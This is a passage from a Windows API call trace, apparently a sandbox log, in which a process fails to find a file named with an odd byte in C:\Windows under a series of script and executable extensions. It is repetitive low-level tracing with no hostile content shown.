"c:\\windows\\\x9f.ps1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.316] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.316] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.316] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.316] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.psm1" (normalized: "c:\\windows\\\x9f.psm1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.317] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.317] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.317] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.317] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.psd1" (normalized: "c:\\windows\\\x9f.psd1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.317] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.318] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.318] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.318] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.COM" (normalized: "c:\\windows\\\x9f.com"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.318] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.318] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.318] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.318] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.EXE" (normalized: "c:\\windows\\\x9f.exe"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.319] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.319] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.319] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.319] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.BAT" (normalized: "c:\\windows\\\x9f.bat"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.320] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.320] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.320] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.320] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.CMD" (normalized: "c:\\windows\\\x9f.cmd"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.320] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.320] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.321] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.321] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.VBS" (normalized: "c:\\windows\\\x9f.vbs"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.321] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.321] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.321] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.321] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.VBE" (normalized: "c:\\windows\\\x9f.vbe"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.322] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.322] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.322] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.322] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.JS" (normalized: "c:\\windows\\\x9f.js"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.323] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.323] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.323] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.323] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.JSE" (normalized: "c:\\windows\\\x9f.jse"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.324] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.324] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.324] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.324] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.WSF" (normalized: "c:\\windows\\\x9f.wsf"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.324] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.324] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.325] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.325] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.WSH" (normalized: "c:\\windows\\\x9f.wsh"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.325] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.325] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.325] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.325] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.MSC" (normalized: "c:\\windows\\\x9f.msc"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.326] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.326] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, 